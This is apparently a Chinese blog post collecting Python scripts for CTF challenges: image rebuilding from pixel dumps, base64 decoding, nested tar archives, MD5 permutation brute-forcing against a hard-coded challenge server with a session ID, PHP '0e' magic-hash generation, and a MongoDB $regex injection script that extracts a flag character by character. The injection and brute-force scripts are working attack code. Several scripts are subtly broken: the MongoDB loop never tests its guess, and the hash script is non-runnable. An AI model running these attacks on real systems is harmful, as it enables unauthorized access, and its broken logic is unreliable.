積累一點ctf需要掌握的常見腳本知識


1.利用像素點還原圖片。

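 # Rebuild an image from a text dump that lists one pixel per line.
from PIL import Image
import re

if __name__ == '__main__':
    # Width and height are obtained by factoring the number of pixel lines
    # in the dump, so ce.txt is expected to hold x * y lines.
    x = 887
    y = 111

    c = Image.new("RGB", (x, y))

    # Each line of ce.txt is read as three comma-separated integers that are
    # used as the (R, G, B) value of one pixel. The context manager closes
    # the file even if a line is malformed and int() raises.
    with open('ce.txt') as file_object:
        # The outer loop walks x, so the dump is consumed column by column.
        for i in range(x):
            for j in range(y):
                # next() works on file objects in Python 2 and 3 alike,
                # unlike the Python-2-only .next() method.
                line = next(file_object)
                lst = line.split(",")  # list of the three channel strings
                c.putpixel((i, j), (int(lst[0]), int(lst[1]), int(lst[2])))

    c.show()
    c.save("c.png")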

 

2.py requests方法的利用以及利用正則匹配查找文本暴力破解md5值。

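 # coding: utf-8
import requests
import re
import hashlib
import itertools

# NOTE(review): the target address and the session identifier are hard-coded
# from one challenge instance. A session ID is a credential; published
# scripts should load such values from configuration instead.
s = requests.session()  # one Session object reused for both requests
url = "http://106.75.67.214:2050/?pass=bee7a613a8fa4f2f"
data = {'PHPSESSID':'6h7b4caq8bo41i3m5fg2983cq5'}
content = s.get(url=url, data=data)

# Pull the expected MD5 digest and the character pool out of the page markup.
target = re.findall(r'sh">(.*)<', content.text)
target = target[0]
poc = re.findall(r'code">(.*)<', content.text)
str1 = poc[0]

# permutations() yields 9-character tuples drawn from str1 without reusing a
# position; join() turns each tuple back into a string. Iterating lazily
# avoids holding every permutation in memory at once.
for chars in itertools.permutations(str1, 9):
    candidate = ''.join(chars)
    # Hash functions operate on bytes, so encode the text explicitly.
    final = hashlib.md5(candidate.encode("utf-8"))
    if final.hexdigest() == target:
        flag = s.get(url="http://106.75.67.214:2050/?code=" + candidate)
        print(flag.content)
        print(flag.headers)
        break  # the matching string has been submitted; nothing left to try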

 3.利用py將base64編碼的字符串還原成圖片

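import os
import base64

# Base64 text to decode. This is a placeholder; paste the real encoded data
# here. (The listing's original literal carried two stray quote characters.)
strs = '''sdasdas=='''

imgdata = base64.b64decode(strs)

# NOTE(review): the output name assumes the decoded bytes are a JPEG; nothing
# here inspects the data, so check the file's magic bytes before trusting the
# extension.
# Binary mode writes the decoded bytes unmodified, and the context manager
# closes the file even if the write fails.
with open('1.jpg', 'wb') as out:
    out.write(imgdata)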

 4.生成0e哈希值(PHP 用 == 比較時,兩個「0e+純數字」形式的字符串都會被當作數值 0,因此被判定為相等;改用 === 或 hash_equals() 即可避免):

 # coding: utf-8
import hashlib
import itertools


def go():
    """Enumerate fixed-length strings and print those with a "0e" digest.

    The listing's intent appears to be: hash each candidate with MD5, append
    the literal "SALT", hash again, and print candidates whose second digest
    is "0e" followed only by decimal digits.

    NOTE(review): as written, `hexdigest` is referenced without being called
    and the second hash object is indexed directly, so this listing records
    the idea rather than a runnable search.

    Such digests matter only where an application compares hashes with PHP's
    loose `==`; comparing with `===` or hash_equals() makes them harmless.
    """
    alphabet = list("qwertyuioplkjhgfdsazxcvbnm123654789")
    print(alphabet)
    # repeat= fixes the length of every generated candidate.
    for combo in itertools.product(alphabet, repeat=30):
        candidate = "".join(combo)
        salted = hashlib.md5(candidate).hexdigest + "SALT"
        outer = hashlib.md5(salted)
        starts_zero = (outer[0] == "0")
        then_e = (outer[1] == "e")
        rest_numeric = (outer[2:].isdigit())
        if starts_zero & then_e & rest_numeric:
            print(candidate)


go()

5.mongodb基於正則注入:

 # coding: utf-8
import requests
import string

# Known prefix of the value being recovered; it grows by one character on
# every request that is counted as a hit.
flag = "c1ctf{"
# Candidate alphabet: ASCII letters followed by digits.
payload = string.ascii_letters + string.digits

url = "http://xx.x.x.x/index.php?"

# The parameter name "passwd[$regex]" only has an effect when the server
# copies request parameters into a MongoDB query without forcing them to
# strings, so that the bracketed key arrives as a query operator
# (presumably via PHP's array parameter parsing; confirm against the target
# application). Casting credentials to strings, rejecting keys that start
# with "$", and comparing password hashes instead of querying on the raw
# password removes this behaviour. Repeated login requests carrying such
# bracketed parameter names are a useful detection signal in access logs.
extended = True
while extended:
    extended = False
    for ch in payload:
        guess = flag + ch
        form = {"username": "admin", "passwd[$regex]": flag + ".*"}
        # Redirects are not followed, so the login response status itself
        # stays visible to the script.
        resp = requests.get(url=url, data=form, allow_redirects=False)
        if not (resp.status_code == "302"):
            continue
        print(guess)
        flag = flag + ch
        extended = True
        if ch == "}":
            exit(0)
        break

6.多次壓縮打包

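 # coding: utf-8
import tarfile

# Innermost layer: a gzip-compressed tar holding flag.py. The original wrapped
# this in a loop that ran exactly once; a plain block does the same work.
# The context manager finalises and closes the archive even if add() fails.
with tarfile.open("shell0.tar.gz", "w:gz") as tfile:
    tfile.add("flag.py")

# Each further layer packs 1.php together with the previous layer's archive,
# producing shell1.tar.gz through shell299.tar.gz.
for i in range(1, 300):
    with tarfile.open("shell" + str(i) + ".tar.gz", "w:gz") as tfile:
        tfile.add("1.php")
        tfile.add("shell" + str(i - 1) + ".tar.gz")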

7.多次解壓:

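# coding: utf-8
import os
import tarfile


def checked_members(archive, dest):
    """Yield the members of *archive* that unpack strictly inside *dest*.

    tarfile.extractall() trusts member names and link entries by default, so
    an archive obtained from someone else can write outside the directory it
    is unpacked into. This generator refuses such entries before anything is
    written. On Python versions that support extraction filters, passing
    filter="data" to extractall() is the built-in equivalent.

    Args:
        archive: an open tarfile.TarFile.
        dest: directory the archive will be extracted into.

    Raises:
        ValueError: if a member is a link or device entry, or if its path
            resolves outside *dest*.
    """
    root = os.path.realpath(dest)
    prefix = os.path.join(root, "")  # root with exactly one trailing separator
    for member in archive.getmembers():
        if member.issym() or member.islnk() or member.isdev():
            raise ValueError(
                "refusing special entry in archive: %r" % member.name)
        resolved = os.path.realpath(os.path.join(root, member.name))
        if resolved != root and not resolved.startswith(prefix):
            raise ValueError(
                "archive entry escapes destination: %r" % member.name)
        yield member


if __name__ == "__main__":
    # Unwrap from the outermost layer (shell299) inwards.
    # NOTE(review): the loop stops at shell1, so an innermost shell0.tar.gz,
    # if present, is left packed; confirm whether that is intended.
    for i in range(299, 0, -1):
        # The archive name needs the dot before "tar.gz"; without it the
        # name does not match the "shell<N>.tar.gz" files being unpacked.
        with tarfile.open("shell" + str(i) + ".tar.gz") as archive:
            archive.extractall(members=checked_members(archive, "."))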

 

